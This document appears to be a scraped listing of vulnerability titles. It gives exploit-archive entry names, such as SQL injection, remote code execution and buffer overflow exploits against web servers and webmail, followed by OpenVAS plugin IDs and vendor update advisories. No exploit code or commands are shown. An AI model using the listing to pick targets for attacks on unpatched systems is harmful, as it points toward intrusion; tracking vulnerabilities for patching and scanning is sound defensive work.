phpWebSite <= 0.10.0-full (topics.php) Remote SQL Injection Exploit [1522] NOCC Webmail <= 1.0 (Local Inclusion) Remote Code Execution Exploit [1498] webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit [1480] Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx) [1474] Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux) [1453] Phpclanwebsite 1.23.1 (par) Remote SQL Injection Exploit [1399] WebWiz Products (1.0 , <= 3.06) - Login Bypass SQL Injection Exploits [1387] Dev Web Management System <= 1.5 (cat) Remote SQL Injection Exploit [1363] Website Baker <= 2.6.0 Login Bypass / Remote Code Execution Exploit [1325] PHPWebThings <= 1.4 (forum) SQL Injection Exploit [1324] PHPWebThings <= 1.4 (msg/forum) SQL Injection Exploit [1274] Hasbani-WindWeb/2.0 - HTTP GET Remote DoS [1260] MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta) [1252] MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit [1239] Virtools Web Player <= 3.0.0.100 Buffer Overflow DoS Exploit [1220] Fastream NETFile Web Server <= 7.1.2 (HEAD) DoS Exploit [1217] phpWebSite <= 0.10.0 (module) SQL Injection Exploit [1210] WebAdmin <= 2.0.4 USER Buffer Overflow Exploit [1194] man2web <= 0.88 Multiple Remote Command Execution Exploit (update2) [1184] Savant Web Server 3.1 - Remote Buffer Overflow Exploit [1099] Baby Web Server <= 2.6.2 Command Validation Exploit [1085] Willing Webcam 2.8 Licence Info Disclosure Local Exploit [1077] Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit [1048] eXtropia Shopping Cart web_store.cgi Remote Exploit [1041] Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3) [1040] Webhints <= 1.03 Remote Command Execution Exploit (c code) (2) [1039] Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1) [1012] Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html) [1011] Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php) [1010] Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl) [1005] WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st) [1004] WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated) [978] Ashley's Web Server Denial of Service Exploit [960] MySQL MaxDB Webtool <= 7.5.00.23 Remote Stack Overflow Exploit [949] PMsoftware Simple Web Server 1.0 - Remote Stack Overflow Exploit [945] PMSoftware Simple Web Server (GET Request) Remote BoF Exploit [944] WheresJames Webcam Publisher Beta 2.0.0014 Remote Buffer Overflow [891] MCPWS Personal WebServer <= 1.3.21 Denial of Service Exploit [864] phpWebLog <= 0.5.3 Arbitrary File Inclusion [847] BadBlue 2.55 Web Server Remote Buffer Overflow [838] webconnect 6.4.4 - 6.5 - Directory Traversal and Denial of Service exploit [819] Savant Web Server 3.1 - Remote BoF (French Win OS support) [787] Savant Web Server 3.1 - Remote Buffer OverflowExploit (win2003) [782] TinyWeb 1.9 - Denial of Service Exploit [781] Savant Web Server 3.1 - Remote Buffer Overflow Exploit [746] Webmin 1.5 - BruteForce + Command Execution [745] Webmin 1.5 - Web Brute Force (cgi-version) [738] iWebNegar Configuration Nullification Denial of Service Exploit [705] Webmin BruteForce and Command Execution Exploit [585] MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030) [423] Easy File Sharing Webserver 1.25 Denial of Service Exploit [419] BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit [406] phpMyWebhosting SQL Injection Exploit [362] Xitami Web Server Denial of Service Exploit [294] HP Web JetAdmin 6.5 (connectedNodes.ovpl) Remote Root Exploit [155] GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit [127] Opera 7.22 - File Creation and Execution Exploit (Webserver) [124] IA WebMail 3.x - (iaregdll.dll version 1.0.0.5) Remote Exploit [96] 4D WebSTAR FTP Server Suite Remote Buffer Overflow Exploit [61] MS Windows 2000 RPC DCOM Interface DoS Exploit [51] MS Windows WebDav III remote root Exploit (xwdav) [36] MS Windows WebDav II (New) Remote Root Exploit [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit [27] CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit [22] Pi3Web 2.0.1 - Denial of Service - Proof of Concept [17] Xeneo Web Server 2.2.9.0 - Denial of Service Exploit [2] MS Windows WebDAV Remote PoC Exploit [1] MS Windows WebDAV (ntdll.dll) Remote Exploit OpenVAS (Nessus) - http://www.openvas.org: [902648] HomeSeer HS2 Web Interface Multiple Vulnerabilities [802279] Virtual Vertex Muster Web Interface Directory Traversal Vulnerability [103513] SMC Networks SMC8024L2 Switch Web Interface Authentication Bypass Vulnerability [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability [100703] Sun Java System Web Server Admin Interface Denial of Service Vulnerability [100687] CUPS Web Interface Multiple Vulnerabilities [100163] Home Web Server Graphical User Interface Remote Denial Of Service Vulnerability [80033] Packeteer Web Management Interface Version [80032] Packeteer Web Management Interface Login [80026] Unencrypted NetScaler web management interface [80024] NetScaler web management interface detection [18413] Allied Telesyn Router/Switch Web interface found with default password [17972] SonicWall SOHO Web Interface XSS [12301] Citrix Web Interface XSS [11125] MLDonkey web interface detection [11076] Oracle webcache admin interface DoS [10877] GroupWise Web Interface 'HELP' hole [10873] GroupWise Web Interface 'HTMLVER' hole [903038] MS Exchange Server WebReady Document Viewing Remote Code Execution Vulnerabilities (2740358) [903013] Dell Webcam 'crazytalk4.ocx' ActiveX Multiple BOF Vulnerabilities [902844] Oracle iPlanet Web Server Multiple Cross Site Scripting Vulnerabilities [902822] PHP Built-in WebServer 'Content-Length' Denial of Service Vulnerability [902724] WellinTech KingView 'KVWebSvr.dll' ActiveX Control Heap Buffer Overflow Vulnerability [902610] IBM WebSphere Application Server Multiple CSRF Vulnerabilities [902589] GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities [902510] RT (Request Tracker) Search Interface Information Disclosure Vulnerability [902457] IBM WebSphere Application Multiple Vulnerabilities Jul-11 [902414] docuFORM Mercury WebApp Multiple Cross-Site Scripting Vulnerabilities [902371] InduSoft Web Studio Directory Traversal Vulnerability [902346] PIPI Player PIPIWebPlayer ActiveX Control Buffer Overflow Vulnerability [902338] AR Web Content Manager Multiple Directory Traversal Vulnerabilities [902292] IBM WebSphere Application Server (WAS) Security Bypass Vulnerability [902252] IBM WebSphere Application Server Administration Console DoS vulnerability [902251] IBM WebSphere Application Server WS-Security Policy Unspecified vulnerability [902213] IBM WebSphere Application Server (WAS) Cross-site Scripting Vulnerability [902188] SpringSource tc Server 'JMX' Interface Security Bypass Vulnerability [902135] TT Web Site Manager 'tt_name' Remote SQL Injection Vulnerability [902134] TT Web Site Manager Version Detection [902073] Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10 [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability [901171] Kolibri Webserver 'HEAD' Request Processing Buffer Overflow Vulnerability [901160] Google Chrome 'WebKit' Multiple Vulnerabilities (Linux) - Sep 10 [901088] Valarsoft Webmatic Multiple XSS and SQL Injection Vulnerabilities [901087] Valarsoft Webmatic Version Detection [901077] IBM DB2 Client Interfaces component Unspecified Vulnerabilities (Linux) [901076] IBM DB2 Client Interfaces component Unspecified Vulnerabilities (Win) [901024] Uebimiau Webmail Information Disclosure Vulnerability [901023] Uebimiau Webmail Version Detection [900943] OpenWebMail Multiple XSS Vulnerabilities [900870] Apple Safari 'WebKit.dll' Stack Consumption Vulnerability [900827] WebDAV Neon Version Detection [900711] Microsoft IIS WebDAV Remote Authentication Bypass Vulnerability [900537] DivX Web Player Buffer Overflow Vulnerability [900534] DivX Web Player Version Detection [900517] Opera Web Browser Multiple Vulnerabilities (Linux) [900516] Opera Web Browser Multiple Vulnerabilities (Win) [900441] WebSVN Script Multiple Vulnerabilities [900440] WebSVN version detection [900402] Pi3Web ISAPI Requests Handling DoS Vulnerability [900380] Google Chrome Web Script Execution Vulnerabilites - Jun09 [900373] RTWebalbum SQL Injection Vulnerability [900370] Google Chrome Web Script Execution Vulnerabilites - June09 [900369] Apple Safari Web Script Execution Vulnerabilites - June09 [900368] Opera Web Script Execution Vulnerabilities - June09 (Linux) [900367] Opera Web Script Execution Vulnerabilities - June09 (Win) [900366] Microsoft Internet Explorer Web Script Execution Vulnerabilites [900289] Active Directory Certificate Services Web Enrollment Elevation of Privilege Vulnerability (2518295) [900268] Mongoose Webserver Content-Length Denial of Service Vulnerability [900265] Consent User Interface Privilege Escalation Vulnerability (2442962) [900205] Trend Micro Web Management Authentication Bypass Vulnerability [900115] Anzio Web Print Object ActiveX Control Remote BOF Vulnerability [900103] Blue Coat K9 Web Protection Multiple Buffer Overflow Vulnerabilities [900082] Opera Web Browser Multiple Vulnerabilities - Dec08 (Linux) [900081] Opera Web Browser Multiple Vulnerabilities - Dec08 (Win) [900039] Opera Web Browser Multiple Security Vulnerabilities Aug-08 (Linux) [900038] Opera Web Browser Multiple Security Vulnerabilities Aug-08 (Win) [900007] Outlook Web Access for Exchange Server Elevation of Privilege (953747) [881534] CentOS Update for icedtea-web CESA-2012:1434 centos6 [881466] CentOS Update for icedtea-web CESA-2012:1132 centos6 [870858] RedHat Update for icedtea-web RHSA-2012:1434-01 [870802] RedHat Update for icedtea-web RHSA-2012:1132-01 [870727] RedHat Update for webkitgtk RHSA-2011:0177-01 [870699] RedHat Update for icedtea-web RHSA-2011:1100-01 [870653] RedHat Update for icedtea-web RHSA-2011:1441-01 [864886] Fedora Update for libsocialweb FEDORA-2012-17746 [864873] Fedora Update for libsocialweb FEDORA-2012-17749 [864864] Fedora Update for icedtea-web FEDORA-2012-17745 [864857] Fedora Update for icedtea-web FEDORA-2012-17762 [864713] Fedora Update for icedtea-web FEDORA-2012-14316 [864706] Fedora Update for icedtea-web FEDORA-2012-14340 [864389] Fedora Update for WebCalendar FEDORA-2012-1898 [864083] Fedora Update for libsocialweb FEDORA-2011-15833 [864034] Fedora Update for WebCalendar FEDORA-2012-1934 [863808] Fedora Update for icedtea-web FEDORA-2011-15691 [863646] Fedora Update for libsocialweb FEDORA-2011-15839 [863612] Fedora Update for icedtea-web FEDORA-2011-15673 [863568] Fedora Update for gnome-web-photo FEDORA-2011-13467 [863506] Fedora Update for gnome-web-photo FEDORA-2011-12275 [863453] Fedora Update for gnome-web-photo FEDORA-2011-11084 [863375] Fedora Update for icedtea-web FEDORA-2011-9541 [863337] Fedora Update for gnome-web-photo FEDORA-2011-8647 [863077] Fedora Update for gnome-web-photo FEDORA-2011-6205 [863065] Fedora Update for gnome-web-photo FEDORA-2011-6215 [862948] Fedora Update for gnome-web-photo FEDORA-2011-3917 [862940] Fedora Update for gnome-web-photo FEDORA-2011-3946 [862904] Fedora Update for pywebdav FEDORA-2011-2470 [862888] Fedora Update for pywebdav FEDORA-2011-2460 [862886] Fedora Update for gnome-web-photo FEDORA-2011-2447 [862869] Fedora Update for gnome-web-photo FEDORA-2011-2444 [862850] Fedora Update for webkitgtk FEDORA-2011-1224 [862779] Fedora Update for webkitgtk FEDORA-2011-0121 [862734] Fedora Update for gnome-web-photo FEDORA-2010-18775 [862725] Fedora Update for gnome-web-photo FEDORA-2010-18773 [862652] Fedora Update for gnome-web-photo FEDORA-2010-15093 [862581] Fedora Update for gnome-web-photo FEDORA-2010-16897 [862504] Fedora Update for gnome-web-photo FEDORA-2010-16885 [862494] Fedora Update for gnome-web-photo FEDORA-2010-16593 [862482] Fedora Update for gnome-web-photo FEDORA-2010-16883 [862465] Fedora Update for webkitgtk FEDORA-2010-15957 [862461] Fedora Update for webkitgtk FEDORA-2010-15982 [862425] Fedora Update for gnome-web-photo FEDORA-2010-15070 [862410] Fedora Update for webkitgtk FEDORA-2010-14419 [862409] Fedora Update for webkitgtk FEDORA-2010-14409 [862384] Fedora Update for gnome-web-photo FEDORA-2010-14362 [862255] Fedora Update for gnome-web-photo FEDORA-2010-11345 [862253] Fedora Update for gnome-web-photo FEDORA-2010-11375 [862190] Fedora Update for gnome-web-photo FEDORA-2010-10344 [862171] Fedora Update for gnome-web-photo FEDORA-2010-10361 [861826] Fedora Update for gnome-web-photo FEDORA-2010-5506 [861809] Fedora Update for gnome-web-photo FEDORA-2010-5515 [861640] Fedora Update for gnome-web-photo FEDORA-2010-1727 [861620] Fedora Update for gnome-web-photo FEDORA-2010-1936 [861529] Fedora Update for gnome-web-photo FEDORA-2007-3962 [861229] Fedora Update for kdewebdev FEDORA-2007-2985 [860929] Fedora Update for gnome-web-photo FEDORA-2008-11598 [860900] Fedora Update for gnome-web-photo FEDORA-2008-9669 [860728] Fedora Update for gnome-web-photo FEDORA-2008-8425 [860715] Fedora Update for gnome-web-photo FEDORA-2008-11551 [860689] Fedora Update for gnome-web-photo FEDORA-2008-9667 [860616] Fedora Update for gnome-web-photo FEDORA-2008-1535 [860563] Fedora Update for WebKit FEDORA-2008-3415 [860522] Fedora Update for gnome-web-photo FEDORA-2008-6491 [860439] Fedora Update for gnome-web-photo FEDORA-2008-6127 [860374] Fedora Update for gnome-web-photo FEDORA-2008-8399 [860195] Fedora Update for WebKit FEDORA-2008-6186 [860170] Fedora Update for gnome-web-photo FEDORA-2008-11511 [860147] Fedora Update for gnome-web-photo FEDORA-2008-3283 [860141] Fedora Update for gnome-web-photo FEDORA-2008-2682 [860117] Fedora Update for WebKit FEDORA-2008-6220 [860025] Fedora Update for WebKit FEDORA-2008-3229 [855418] Solaris Update for Sun Java Web Console (Lockhart) 121212-02 [855215] Solaris Update for Sun Java Web Console (Lockhart) 121211-02 [855209] Solaris Update for Mozilla Firefox Web browser 125540-06 [850308] SuSE Update for icedtea-web openSUSE-SU-2012:0981-1 (icedtea-web) [850112] SuSE Update for mono-web SUSE-SA:2007:002 [841220] Ubuntu Update for libunity-webapps USN-1635-1 [841212] Ubuntu Update for icedtea-web USN-1625-1 [841198] Ubuntu Update for webkit USN-1617-1 [841127] Ubuntu Update for icedtea-web USN-1505-2 [841100] Ubuntu Update for webkit USN-1524-1 [841098] Ubuntu Update for icedtea-web USN-1521-1 [840805] Ubuntu Update for icedtea-web USN-1263-1 [840730] Ubuntu Update for webkit USN-1195-1 [840712] Ubuntu Update for icedtea-web USN-1178-1 [840517] Ubuntu Update for webkit vulnerabilities USN-1006-1 [840221] Ubuntu Update for webkit vulnerability USN-676-1 [835253] HP-UX Update for Apache Web Server HPSBUX02645 [835247] HP-UX Update for Apache-based Web Server HPSBUX02612 [835233] HP-UX Update for Apache-based Web Server HPSBUX02531 [835224] HP-UX Update for Apache-based Web Server HPSBUX02465 [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431 [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401 [835108] HP-UX Update for HP WEBM Services HPSBUX00288 [835084] HP-UX Update for Webmin HPSBUX00250 [835076] HP-UX Update for Java Web Start HPSBUX01214 [835048] HP-UX Update for JAVA Web Start HPSBUX00188 [831710] Mandriva Update for icedtea-web MDVSA-2012:122 (icedtea-web) [831418] Mandriva Update for webmin MDVSA-2011:109 (webmin) [831343] Mandriva Update for webkit MDVSA-2011:039 (webkit) [831260] Mandriva Update for kolab-webadmin MDVA-2010:230 (kolab-webadmin) [830873] Mandriva Update for webmin MDVSA-2010:036 (webmin) [830863] Mandriva Update for mmc-web-base MDVA-2010:051 (mmc-web-base) [830848] Mandriva Update for webkit MDVA-2010:046 (webkit) [830601] Mandriva Update for webmin MDVA-2008:041 (webmin) [830520] Mandriva Update for kdewebdev4 MDVA-2008:188 (kdewebdev4) [830080] Mandriva Update for webmin MDKSA-2007:135 (webmin) [803117] OurWebFTP Multiple Cross Site Scripting Vulnerabilities [803108] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Mac OS X) [803053] WeBid Multiple Vulnerabilities [802996] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Windows) [802993] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Mac OS X) [802916] Simple Web Server Connection Header Buffer Overflow Vulnerability [802851] IBM WebSphere Application Server 'plugin-key.kdb' Information Disclosure Vulnerability [802814] Apple Safari Webkit Multiple Vulnerabilities - March12 (Win) [802813] Apple Safari Webkit Multiple Vulnerabilities - March12 (Mac OS X) [802797] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Mac OS X) [802796] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Windows) [802754] Opera Web Browser Select Object Denial Of Service Vulnerability (Mac OS X) [802685] IBM RBD Web Services Information Disclosure Vulnerability (Win) [802601] NeoAxis Web Player Zip File Directory Traversal Vulnerability [802563] IBM Web Experience Factory Multiple Cross Site Scripting Vulnerabilities [802537] InduSoft Web Studio Multiple Remote Code Execution Vulnerabilitites [802499] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802498] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Mac OS X) [802497] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Linux) [802496] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802494] Media Player Classic (MPC) Webserver Multiple Vulnerabilities [802418] IBM WebSphere Application Server Hash Collisions DOS Vulnerability [802413] IBM WebSphere Application Server IVT Cross Site Scripting Vulnerability [802412] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities - (Jan2012) [802410] HServer Webserver Multiple Directory Traversal Vulnerabilities [802408] PHP Web Form Hash Collision Denial of Service Vulnerability (Win) [802400] IBM WebSphere Application Server JNDI information disclosure Vulnerability [802390] Sphinx Mobile Web Server 'comment' Multiple Cross-Site Scripting Vulnerabilities [802350] Mbedthis AppWeb HTTP TRACE Method Cross-Site Scripting Vulnerability [802341] Web File Browser 'act' Parameter File Download Vulnerability [802315] Ileys Web Control SQL Injection Vulnerability [802307] LuxCal Web Calendar SQL Injection Vulnerability [802305] WebCalendar Multiple Cross Site Scripting Vulnerabilities [802304] Google Chrome WebGL Texture Information Disclosure Vulnerability (Linux) [802303] Google Chrome WebGL Texture Information Disclosure Vulnerability (Windows) [802296] Savant Web Server Remote Buffer Overflow Vulnerability [802293] XAMPP WebDAV PHP Upload Vulnerability [802283] Apple Safari WebKit Information Disclosure Vulnerability (Mac OS X) [802282] Apple Safari WebKit Information Disclosure Vulnerability (Windows) [802280] 3S CoDeSys CmpWebServer Multiple Vulnerabilities [802270] GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities [802261] XAMPP Web Server Multiple Cross Site Scripting Vulnerabilities [802258] Webmin / Usermin Login Cross Site Scripting Vulnerability [802228] Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple XSS Vulnerabilities [802211] Mozilla Products WebGL Information Disclosure Vulnerability July-11 (Windows) [802156] Sunway ForceControl WebServer 'httpsvr.exe' Buffer Overflow Vulnerability [802139] Mongoose Web Server Remote Buffer Overflow Vulnerability [802041] PROMOTIC SCADA/HMI Webserver Directory Traversal Vulnerability [802025] Xitami Web Server If-Modified-Since Buffer Overflow Vulnerability [802020] Serva32 web server Denial of Service Vulnerability [802010] Nostromo nhttpd Webserver Directory Traversal Vulnerability [802007] Hiawatha WebServer 'Content-Length' Denial of Service Vulnerability [801999] IBM WebSphere Application Server Admin Console Cross-site Scripting Vulnerability [801998] IBM WebSphere Application Server JSF Application Information Disclosure Vulnerability [801997] Oracle GlassFish/System Application Server Web Container DOS Vulnerability [801989] CodeMeter WebAdmin 'Licenses.html' Cross Site Scripting Vulnerability [801988] CodeMeter WebAdmin Version Detection [801981] Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities [801977] IBM WebSphere Application Server Administration Directory Traversal Vulnerability [801925] Qianbo Enterprise Web Site Management System Cross Site Scripting Vulnerability [801911] AR Web Content Manager (AWCM) 'search.php' Cross Site Scripting Vulnerability [801888] IBM WebSphere Application Server WS-Security XML Encryption Weakness Vulnerability [801867] Apple Safari Webkit Multiple Vulnerabilities - March 2011 [801864] IBM WebSphere Application Server (WAS) Security Bypass Vulnerability - March 2011 [801863] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities 02 - March 2011 [801862] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities 01 - March 2011 [801861] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities - March 2011 [801859] CGI:IRC 'nonjs' Interface Cross Site Scripting Vulnerability [801852] F-Secure Policy Manager 'WebReporting' Module XSS And Path Disclosure Vulnerabilities [801830] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability [801808] SurgeMail SurgeWeb Cross Site Scripting Vulnerability [801774] Google Chrome 'Webkit' CSS Implementation DoS Vulnerability (Linux) [801773] Google Chrome 'WebKit' CSS Implementation DoS Vulnerability (Windows) [801717] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability [801654] VMware 2 Web Server Directory Traversal Vulnerability (Win) [801647] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities [801646] IBM WebSphere Application Server (WAS) XSS and CSRF Vulnerabilities [801641] Apple Safari Webkit Multiple Vulnerabilities - Nov10 [801607] Oracle iPlanet Web Server Multiple Unspecified vulnerabilities [801535] FreshWebMaster Fresh FTP Filename Directory Traversal Vulnerability [801533] Mongoose Web Server Multiple Directory Traversal Vulnerabilities [801532] Oracle Java System Web Server HTTP Response Splitting Vulnerability [801518] NetArtMedia WebSiteAdmin Directory Traversal Vulnerability [801480] Microsoft Web Services on Devices API Remote Code Execution Vulnerability (973565) [801392] Nessus Web Server Version Detection [801332] Apple Safari 'webkit' Denial Of Service Vulnerability [801316] VMware WebAccess Cross Site Scripting vulnerability (Linux) [801315] VMware WebAccess Cross Site Scripting vulnerability (Win) [801309] VMware WebAccess Multiple Vulnerabilities (Linux) [801308] VMware WebAccess Multiple Vulnerabilities (Win) [801288] Wiccle Web Builder 'post_text' Cross-Site Scripting Vulnerability [801225] Computer Associates WebScan ActiveX Control Multiple Remote Code Execution Vulnerabilities [801223] Weborf Webserver Version Detection [801222] Weborf 'Range' Header Denial of Service Vulnerability [801147] Sun Java System Web Server Buffer Overflow Vulnerability (Linux) [801146] Sun Java System Web Server Buffer Overflow Vulnerability (Win) [800962] httpdx Web Server 'h_handlepeer()' Buffer Overflow Vulnerability [800922] Opera Web Browser Select Object Denial Of Service Vulnerability (Linux) [800921] Opera Web Browser Select Object Denial Of Service Vulnerability (Win) [800899] QtWeb 'javascript:' And 'data:' URI XSS Vulnerability [800898] QtWeb Version Detection [800866] Sun Java System Web Proxy Server Denial Of Service Vulnerability (Linux) [800865] Sun Java System Web Proxy Server Denial Of Service Vulnerability (Win) [800864] Sun Java System Web Proxy Server Version Detection [800845] Microsoft Office Web Components ActiveX Control Code Execution Vulnerability [800826] Sun Java Web Console Multiple XSS Vulnerabilities [800825] Sun Java Web Console Version Detection [800822] V-webmail Multiple PHP Remote File Inclusion Vulnerability [800821] V-webmail Version Detection [800812] Sun Java System Web Proxy Server Vulnerabilities (Win) [800811] Sun Java System Web Proxy Server Vulnerabilities (Win) [800760] OpenX Administrative Interface Authentication Bypass Vulnerability [800675] Kerio MailServer WebMail 'Integration' Page XSS Vulnerability [800658] Sun Java System Web Server '.jsp' Information Disclosure Vulnerability (Win) [800652] Opera Web Browser 'Refresh' Header XSS Vulnerabilities (Linux) [800651] Opera Web Browser 'Refresh' Header XSS Vulnerabilities (Win) [800551] Opera Web Browser XML Denial Of Service Vulnerability (Linux) [800550] Opera Web Browser XML Denial Of Service Vulnerability (Win) [800493] Apple Safari Webkit Multiple Vulnerabilities [800472] WebCalendar Multiple CSS and CSRF Vulnerabilities [800412] Mongoose Web Server Source Code Disclosure Vulnerability [800411] NaviCOPA Web Server Source Code Disclosure Vulnerability [800222] webcamXP URL Directory Traversal Vulnerability [800221] webcamXP Version Detection [800187] MinaliC Webserver Denial of Service Vulnerability [800175] Xerver HTTP Server Web Administration Denial of Service Vulnerability [800161] Sun Java System Web Server Denial of Service Vulnerability (Win) [800160] Sun Java System Web Server Multiple Heap-based Buffer Overflow Vulnerabilities (Linux) [800159] South River Technologies WebDrive Local Privilege Escalation Vulnerability [800158] South River WebDrive Version Detection [800157] Sun Java System Web Server Multiple Vulnerabilities (Win) [800156] Sun Java System Web Server Multiple Vulnerabilities (Linux) [800127] Sun Java Web Start Remote Command Execution Vulnerability (Linux) [800126] Sun Java Web Start Remote Command Execution Vulnerability (Win) [800121] Google Chrome Web Browser FTP Client XSS Vulnerability [800115] Multiple XSS Vulnerabilities in PHPWebGallery - Oct08 [800100] Apple Safari WebKit Property Memory Leak Remote DoS Vulnerability [800081] Opera Web Browser DoS attacks on MIME via malformed MIME emails (Win) [800080] Apple iPhone Configuration Web Utility Directory Traversal Vulnerability [800066] Opera Web Browser Heap Based Buffer Overflow Vulnerability (Win) [800049] Opera Web Browser Command Execution and XSS Vulnerabilities (Linux) [800048] Opera Web Browser Command Execution and XSS Vulnerabilities (Win) [800045] Opera Web Browser Multiple XSS Vulnerability (Linux) [800044] Opera Web Browser Multiple XSS Vulnerability (Win) [800043] Firefox Web Browser FTP Client XSS Vulnerability (Linux) [800042] Firefox Web Browser FTP Client XSS Vulnerability (Win) [800026] Sun Java System Web Proxy Server Two Vulnerabilities (Linux) [800025] Sun Java System Web Proxy Server Vulnerabilities (Win) [103506] SpecView Web Server Directory Traversal Vulnerability [103505] webERP Multiple Remote and Local File Include Vulnerabilities [103487] Kerio WinRoute Firewall Web Server Remote Source Code Disclosure Vulnerability [103476] WebCalendar Local File Include and PHP code Injection Vulnerabilities [103439] webgrind 1.0 (file param) Local File Inclusion Vulnerability [103434] WebcamXP and Webcam7 Directory Traversal Vulnerability [103432] webgrind 'dataFile' Parameter Cross Site Scripting Vulnerability [103421] STHS v2 Web Portal 'team' parameter Multiple SQL Injection Vulnerabilities [103368] WebSVN 'path' Parameter Multiple Cross Site Scripting Vulnerabilities [103343] webERP Information Disclosure, SQL Injection, and Cross Site Scripting Vulnerabilities [103279] IceWarp Web Mail Multiple Information Disclosure Vulnerabilities [103277] IBM WebSphere Application Server Cross-Site Request Forgery Vulnerability [103234] phpWebSite 'mod.php' SQL Injection Vulnerability [103212] phpWebSite 'page_id' Parameter Cross Site Scripting Vulnerability [103174] Simple web-server Directory Traversal Vulnerability [103150] Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross Site Scripting Vulnerability [103148] up.time Software Administration Interface Remote Authentication Bypass Vulnerability [103142] DynMedia Pro Web CMS 'downloadfile.php' Local File Disclosure Vulnerability [103134] webEdition CMS HTML Injection and Local File Include Vulnerabilities [103131] wodWebServer.NET 1.3.3 Directory Traversal [103125] eDirectory DHost Web Server Detection [103122] Apache Web Server ETag Header Information Disclosure Weakness [103107] phpWebSite 'local' Parameter Cross Site Scripting Vulnerability [103106] phpWebSite Detection [103055] TinyWebGallery Cross Site Scripting and Local File Include Vulnerabilities [103050] Weborf 'get_param_value()' Function HTTP Header Handling Denial Of Service Vulnerability [103044] web@all 'url' Parameter Cross Site Scripting Vulnerability [103029] IBM WebSphere Application Server Multiple Vulnerabilities [103010] Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability [103007] Alt-N WebAdmin Remote Source Code Information Disclosure Vulnerability [103001] Appweb Web Server Cross Site Scripting Vulnerability [102015] Microsoft RPC Interface Buffer Overrun (KB824146) [102009] WebAPP Detection [100945] Helix Server Administration Interface Cross Site Request Forgery Vulnerability [100917] YOPS (Your Own Personal [WEB] Server) Remote Buffer Overflow Vulnerability [100915] TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities [100904] IBM WebSphere Application Server JAX-WS Denial Of Service Vulnerability [100891] Webmedia Explorer HTML Injection Vulnerability [100878] Weborf HTTP Request Denial Of Service Vulnerability [100848] Fretsweb Multiple Local File Include Vulnerabilities [100844] Uebimiau Webmail 'stage' Parameter Local File Include Vulnerability [100842] SurgeMail SurgeWeb Cross Site Scripting Vulnerability [100826] Horde IMP Webmail 'fetchmailprefs.php' HTML Injection Vulnerability [100805] Axigen Webmail Directory Traversal Vulnerability [100788] Weborf HTTP 'modURL()' Function Directory Traversal Vulnerability [100748] MongoDB Web Admin Detection [100744] LiteSpeed Web Server Source Code Information Disclosure Vulnerability [100743] NuralStorm Webmail Multiple Security Vulnerabilities [100742] Nuralstorm Webmail Detection [100728] Nessus Web Server Plugin Unspecified Cross Site Scripting Vulnerability [100714] Oracle WebLogic Server Encoded URL Remote Vulnerability [100702] Wiki Web Help 'uploadimage.php' Arbitrary File Upload Vulnerability [100701] Wiki Web Help 'getpage.php' SQL Injection Vulnerability [100700] Wiki Web Help Cross Site Scripting and HTML Injection Vulnerabilities [100691] Weborf HTTP Header Processing Denial Of Service Vulnerability [100671] IBM WebSphere Application Server 'addNode.log' Information Disclosure Vulnerability [100647] IBM WebSphere Application Server Long Filename Information Disclosure Vulnerability [100638] MiniWebsvr URI Directory Traversal Vulnerability [100614] Mini Web Server Cross Site Scripting and Directory Traversal Vulnerabilities [100609] IBM WebSphere Application Server SIP Logging Information Disclosure Vulnerability [100567] Sun Java System Web Server Multiple Vulnerabilities [100565] IBM WebSphere Application Server multiple vulnerabilities [100564] IBM WebSphere Application Server Detection [100559] WebMaid CMS Multiple Remote and Local File Include Vulnerabilities [100558] webMAID Detection [100494] Oracle WebLogic Server Node Manager 'beasvc.exe' Remote Command Execution Vulnerability [100452] Zeus Web Server 'SSL2_CLIENT_HELLO' Remote Buffer Overflow Vulnerability [100445] Ruby WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability [100443] Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability [100420] Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities [100419] Barracuda Web Application Firewall Detection 